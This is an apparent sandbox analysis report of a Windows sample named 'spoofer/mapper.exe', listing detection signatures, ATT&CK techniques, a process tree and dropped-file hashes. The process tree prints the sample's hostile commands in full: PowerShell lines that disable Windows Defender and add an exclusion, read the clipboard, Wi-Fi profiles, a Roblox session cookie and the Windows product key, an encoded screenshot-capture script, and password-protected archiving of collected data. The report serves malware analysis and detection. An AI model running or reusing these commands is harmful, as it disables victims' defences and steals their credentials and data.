Analysis

  • max time kernel
    94s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29-11-2024 13:40

General

  • Target

    spoofer/mapper.exe

  • Size

    7.5MB

  • MD5

    4f8ee6ff1ed295b4227a8e9e536c9a48

  • SHA1

    204116eef3f0d564240d4082d5dea7c89d98495e

  • SHA256

    e29649ae22328d57f3f6ec42d10bdf496b3d62351e6c90ab070f9bd966e22cfc

  • SHA512

    441941116f6c815dbed18639a519aae55d494b199625c22e668a54e1583fe14181fb464047e951391efc4b6740eb25a59040f13c13cc7fcc5d833400cb2d69ae

  • SSDEEP

    196608:9hgFO2gDwfI9jUC2gYBYv3vbW5+iITm1U6fE:8FO2gwIH2gYBgDW4TOzc

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • UPX packed file 60 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\spoofer\mapper.exe
    "C:\Users\Admin\AppData\Local\Temp\spoofer\mapper.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1488
    • C:\Users\Admin\AppData\Local\Temp\spoofer\mapper.exe
      "C:\Users\Admin\AppData\Local\Temp\spoofer\mapper.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4912
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\spoofer\mapper.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1304
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\spoofer\mapper.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4868
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4064
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3096
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3796
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4736
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3200
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:4828
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1952
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:3508
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Clipboard Data
        • Suspicious use of WriteProcessMemory
        PID:4624
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Clipboard Data
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3152
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1592
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:716
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:424
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:4168
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          3⤵
          • System Network Configuration Discovery: Wi-Fi Discovery
          • Suspicious use of WriteProcessMemory
          PID:4808
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Network Configuration Discovery: Wi-Fi Discovery
            PID:1268
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "systeminfo"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4108
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            4⤵
            • Gathers system information
            PID:5100
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2656
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4464
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\g0pyehqx\g0pyehqx.cmdline"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:760
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC227.tmp" "c:\Users\Admin\AppData\Local\Temp\g0pyehqx\CSCAD690C58EA8745ECBFE1F1137E6FE85.TMP"
                6⤵
                  PID:1776
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tree /A /F"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:608
            • C:\Windows\system32\tree.com
              tree /A /F
              4⤵
                PID:1936
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tree /A /F"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3684
              • C:\Windows\system32\tree.com
                tree /A /F
                4⤵
                  PID:3092
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:1904
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:4404
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                    PID:384
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:2864
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      3⤵
                        PID:1276
                        • C:\Windows\system32\tree.com
                          tree /A /F
                          4⤵
                            PID:3932
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                          3⤵
                            PID:3208
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                              4⤵
                              • Command and Scripting Interpreter: PowerShell
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2848
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                            3⤵
                              PID:3724
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                4⤵
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4480
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "getmac"
                              3⤵
                                PID:3864
                                • C:\Windows\system32\getmac.exe
                                  getmac
                                  4⤵
                                    PID:4228
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI14882\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\3Cwmd.zip" *"
                                  3⤵
                                    PID:2888
                                    • C:\Users\Admin\AppData\Local\Temp\_MEI14882\rar.exe
                                      C:\Users\Admin\AppData\Local\Temp\_MEI14882\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\3Cwmd.zip" *
                                      4⤵
                                      • Executes dropped EXE
                                      PID:1628
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                    3⤵
                                      PID:4208
                                      • C:\Windows\System32\Wbem\WMIC.exe
                                        wmic os get Caption
                                        4⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1516
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                      3⤵
                                        PID:2180
                                        • C:\Windows\System32\Wbem\WMIC.exe
                                          wmic computersystem get totalphysicalmemory
                                          4⤵
                                            PID:3196
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                          3⤵
                                            PID:4568
                                            • C:\Windows\System32\Wbem\WMIC.exe
                                              wmic csproduct get uuid
                                              4⤵
                                                PID:4120
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                              3⤵
                                                PID:4036
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                  4⤵
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:2516
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                3⤵
                                                  PID:732
                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                    wmic path win32_VideoController get name
                                                    4⤵
                                                    • Detects videocard installed
                                                    PID:3664
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                  3⤵
                                                    PID:1520
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                      4⤵
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:1280
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                1⤵
                                                  PID:1776

                                                Network

                                                MITRE ATT&CK Enterprise v15

                                                Replay Monitor

                                                Loading Replay Monitor...

                                                Downloads

                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                  Filesize

                                                  2KB

                                                  MD5

                                                  d85ba6ff808d9e5444a4b369f5bc2730

                                                  SHA1

                                                  31aa9d96590fff6981b315e0b391b575e4c0804a

                                                  SHA256

                                                  84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                  SHA512

                                                  8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  64B

                                                  MD5

                                                  0ff7e1af4cc86e108eef582452b35523

                                                  SHA1

                                                  c2ccf2811d56c3a3a58dced2b07f95076c6b5b96

                                                  SHA256

                                                  62ed8ef2250f9f744852cb67df0286c80f94e26aed646989b76e5b78f2f1f0d0

                                                  SHA512

                                                  374675fd36cd8bc38acaec44d4cc855b85feece548d99616496d498e61e943fd695fec7c57550a58a32455e8b21b41bafa18cd1dadac69676fff1de1a56da937

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  944B

                                                  MD5

                                                  2e907f77659a6601fcc408274894da2e

                                                  SHA1

                                                  9f5b72abef1cd7145bf37547cdb1b9254b4efe9d

                                                  SHA256

                                                  385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233

                                                  SHA512

                                                  34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                  Filesize

                                                  1KB

                                                  MD5

                                                  bf7b73e38e4a79c2a863a0c331e2000e

                                                  SHA1

                                                  8086254ce77c67e94b9c1380e3f502523399ab9e

                                                  SHA256

                                                  669c79889af6eeb7b96e8050999bf35a9c731b0f03df64496939ebdc043fdad0

                                                  SHA512

                                                  a777d81016f910303546a20f3d1a666fb408fc7c0b442874a910b84317682befc8287c5eb04e5f00fdee156675b699538d9ae3e47dcde24da4f35e68b649e241

